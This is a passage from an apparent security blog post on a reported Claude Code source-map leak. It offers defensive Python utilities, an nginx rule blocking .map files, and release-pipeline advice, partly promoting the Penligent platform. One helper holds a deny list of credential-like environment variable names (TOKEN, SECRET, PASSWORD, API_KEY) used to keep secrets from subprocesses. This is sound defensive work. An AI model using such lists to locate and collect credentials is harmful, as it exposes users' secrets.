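SENSITIVE_MARKERS = ("TOKEN", "SECRET", "PASSWORD", "API_KEY", "CREDENTIAL")


def scrubbed_env(env=None, markers=SENSITIVE_MARKERS):
    """Return a copy of env without variables whose names look sensitive."""
    source = os.environ if env is None else env
    return {
        name: value
        for name, value in source.items()
        if not any(marker in name.upper() for marker in markers)
    }


def run_helper(argv, env=None):
    """Run a helper process that only sees the scrubbed environment."""
    return subprocess.run(
        argv,
        env=scrubbed_env(env),
        capture_output=True,
        text=True,
        check=False,
    )
```

A deny-by-name filter is the weakest useful form of this control. Where the helper's needs are known in advance, an allowlist of variables it may inherit is a tighter design.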

For authorized security teams, a useful compromise pattern is evidence-first use. Let Claude Code reason about code paths, configuration edges, and suspected preconditions. Do not let that reasoning become the final word on exploitability. Anthropic itself says automated security reviews should complement, not replace, existing security practices and manual review. That is a healthy default for this class of tooling generally. (Claude Help Center)

What package publishers should change after reading this

The main lesson for package publishers is not “don’t leak source maps.” That is too shallow to survive contact with a real release pipeline. The actual lesson is that debug artifacts need their own lifecycle and their own access model. Sentry’s documentation already points toward the right architecture: upload source maps privately to the observability backend when possible, or use gated access if public hosting is unavoidable. Treating them as just another static asset is what creates these preventable classes of failure. (Sentry Docs)

Object storage deserves the same discipline. Cloudflare’s R2 docs say public access is never on by default and that r2.dev is a public development URL intended for non-production use cases. That language should already sound like a policy warning to anyone storing release-adjacent artifacts. If your organization places debug archives, symbol bundles, or transient build products into object storage, the safe assumption is that a public development endpoint is the wrong place for them. The fact that bucket root listing is unavailable does not make object exposure safe if some other artifact can disclose the exact key. (Cloudflare Docs)
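One way to catch the "some other artifact discloses the exact key" case is to search shipped files for references to public development endpoints. The following is a minimal sketch, assuming that any https URL whose host ends in `.r2.dev` is worth flagging. The pattern and the function name `find_public_dev_urls` are illustrative assumptions, not part of any Cloudflare tooling.

```python
import re

# Assumed pattern: any https URL whose host ends in .r2.dev.
PUBLIC_DEV_URL_RE = re.compile(r"https://[A-Za-z0-9.-]+\.r2\.dev/[^\s\"'<>)]*")


def find_public_dev_urls(text):
    """Return the distinct r2.dev URLs found in text, in first-seen order."""
    seen = []
    for url in PUBLIC_DEV_URL_RE.findall(text):
        if url not in seen:
            seen.append(url)
    return seen
```

Run against the text of every file in a release artifact, a non-empty result is a prompt for review: either the URL should not be in the artifact, or the object behind it should not be publicly readable.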

The other engineering lesson is that post-build inspection must happen against the final package, not the source tree. Teams often have linters that ban secrets in repositories and CI jobs that scan Docker images. Far fewer teams inspect the exact tarball, zip, or CDN-uploaded object tree that users consume. The Claude Code incident, like the Astro sourcemap advisory before it, is a reminder that the public artifact can diverge from the developer’s mental model in subtle ways. A package can be “clean” in repo terms and still ship a disclosure path once build, upload, and mirroring are finished. (GitHub)
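Inspecting the final package can be as simple as opening the packed tarball and looking for debug artifacts before publishing. The sketch below assumes a gzip-compressed tarball such as the one `npm pack` produces. The function name `audit_tarball` and the set of file extensions it checks are choices made for this example, not an established tool.

```python
import re
import tarfile

# Matches the trailing comment that points a bundle at its source map.
SOURCE_MAPPING_RE = re.compile(rb"[#@]\s*sourceMappingURL=(\S+)")


def audit_tarball(fileobj):
    """Return (member_name, reason) findings for a packed .tgz file object."""
    findings = []
    with tarfile.open(fileobj=fileobj, mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            if member.name.endswith(".map"):
                findings.append((member.name, "source map shipped in package"))
                continue
            if member.name.endswith((".js", ".mjs", ".cjs", ".css")):
                data = tar.extractfile(member).read()
                match = SOURCE_MAPPING_RE.search(data)
                if match:
                    # Truncate so inline data: URIs do not flood the report.
                    target = match.group(1).decode("utf-8", "replace")[:80]
                    findings.append((member.name, f"references source map: {target}"))
    return findings
```

In a release job, the tarball would be opened in binary mode and passed to `audit_tarball`, with the job failing on any finding. The important property is that the check runs on the exact bytes users will download, after bundling and packing, rather than on the repository.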

A minimal web-side control is still worth using when the deployment model supports it. If your public web server should never serve .map files, say so explicitly.

    location ~* \.(js|css)\.map$ {
        return 403;
    }

That is not a complete strategy. It will not save you if your package manager, CDN, or object store exposes the artifacts elsewhere. It still closes one easy failure mode. And if your organization does need sourcemaps for debugging, Sentry’s guidance gives a better pattern than “leave them public and hope no one notices.” (Sentry Docs)

A final publisher lesson is cultural. Teams should stop treating source disclosure as harmless whenever “there are no secrets in source.” The Astro advisory explicitly says the immediate impact can be limited to source code, but that disclosed source can then enable discovery of additional vulnerabilities. OWASP says the same thing more generally in its testing guide. For an agentic runtime, that downstream effect is not hypothetical. The implementation itself is part of the attack surface. (GitHub)

Why white-box findings need black-box proof after a leak like this

A source disclosure event creates a flood of plausible bug theories. Some of those theories will be right. Many will be wrong. Others will only apply to older builds, different deployment paths, or disabled features. That is why post-leak security work needs a clean separation between white-box reasoning and black-box proof. Anthropic’s own automated security review docs make the same philosophical move in gentler language: security review features help find issues, but they are complements to broader security practice, not substitutes for it. (Claude Help Center)

That distinction is also the most useful place to mention Penligent without turning this piece into a sales page. Penligent’s own Claude-related material consistently argues for evidence-first workflows: use Claude Code to reason about code, trust boundaries, and likely paths; use external validation to determine whether those paths are reachable and meaningful in the deployed environment; then retest after the fix. That is exactly the right posture after a source exposure event, because a readable codebase generates more hypotheses than any team should treat as findings by default. (penligent.ai)

In practice the workflow is straightforward. A security team can take a suspected permission edge, startup-order flaw, or tool-invocation path from white-box review and turn it into a controlled retest plan against staging or another authorized environment. A platform built around repeatable validation and evidence capture, including Penligent, is useful here not because it makes code review obsolete, but because it forces the argument back onto reachability, observed behavior, and reproducible proof. That is the discipline that keeps teams from turning every leaked implementation detail into a phantom critical. (penligent.ai)

The inverse is also true. A confirmed black-box effect without code context is often slower to fix cleanly. That is why the white-box to black-box loop matters. Claude Code can help explain what a suspected flaw is supposed to do. External validation can test what the deployed system actually does. The merge point between those two is where useful security work happens. (Claude Help Center)

What to watch next

The next authoritative signals will not come from reposted screenshots. They will come from Anthropic release notes, GitHub releases, package distribution changes, and any formal incident communication the company chooses to publish. As of the official sources reviewed here, public release notes still show 2.1.88 as the latest Claude Code release, and Anthropic’s docs still describe npm installation only as a deprecated compatibility path. Those are the places defenders should keep watching for packaging or distribution follow-up. (Claude)

It is also worth watching public package mirrors and your own internal caches. Public jsDelivr pages still track 2.1.88 as a version in the ecosystem. Even when a vendor removes or changes one distribution path, mirror presence and local cache persistence can complicate cleanup and forensic certainty. If your team needs a definitive answer, inspect the exact artifact your environment actually stored or installed. (jsDelivr)
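For the local-artifact question, the useful check is whether any source map in the installed or cached package actually embeds original source. In the source map v3 format, `sources` lists original file names and `sourcesContent` optionally carries their full text, which is what makes reconstruction straightforward. The sketch below assumes flat (non-indexed) source maps and uses hypothetical function names. Point it at whatever directory your environment really installed or cached.

```python
import json
from pathlib import Path


def summarize_source_map(map_path):
    """Report how many original sources a source map names and embeds."""
    data = json.loads(Path(map_path).read_text(encoding="utf-8"))
    sources = data.get("sources") or []
    contents = data.get("sourcesContent") or []
    embedded = sum(1 for item in contents if item)
    return {"path": str(map_path), "sources": len(sources), "embedded": embedded}


def find_source_maps(root):
    """Summarize every .map file under root, skipping ones that do not parse."""
    reports = []
    for path in sorted(Path(root).rglob("*.map")):
        try:
            reports.append(summarize_source_map(path))
        except (OSError, ValueError, AttributeError):
            # Unreadable, not JSON, or not a JSON object: not a usable map.
            continue
    return reports
```

An empty result for a given install is evidence about that install only. It says nothing about what other mirrors or caches held at the time of the original reports.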

The deeper lesson is bigger than Claude Code. Agentic developer tools are not ordinary software from a security-review perspective. They sit at the boundary between code, shell, credentials, cloud APIs, remote orchestration, and policy. That means their release artifacts deserve the same seriousness as the runtimes they wrap. A source map leak in that class of software is never just a cosmetic embarrassment. It is a reminder that the build pipeline, the package registry, the object store, and the approval model are all part of one security system. (Claude)

Further reading

- Anthropic, Claude Code overview (Claude)

- Anthropic, Claude Code security, sandboxing, permissions, and permission modes (Claude)

- Anthropic, Remote Control and Claude Code data usage (Claude)

- Anthropic, Automated Security Reviews in Claude Code (Claude Help Center)

- Anthropic, Claude Code release notes and GitHub releases, including v2.1.88 and v2.1.83 (Claude)

- Cloudflare, R2 public buckets and r2.dev public development URLs (Cloudflare Docs)

- MDN, OWASP, and Sentry on source maps, information leakage, and private handling of debug artifacts (MDN Web Docs)

- GitHub advisory for Astro, server source disclosure through sourcemaps (GitHub)

- GitHub advisories for Claude Code, CVE-2025-52882, CVE-2025-59828, CVE-2025-58764, CVE-2025-64755, and CVE-2026-21852 (GitHub)

- Penligent, Claude AI for Pentest Copilot, Building an Evidence-First Workflow With Claude Code (penligent.ai)

- Penligent, Claude Code Security and Penligent, From White-Box Findings to Black-Box Proof (penligent.ai)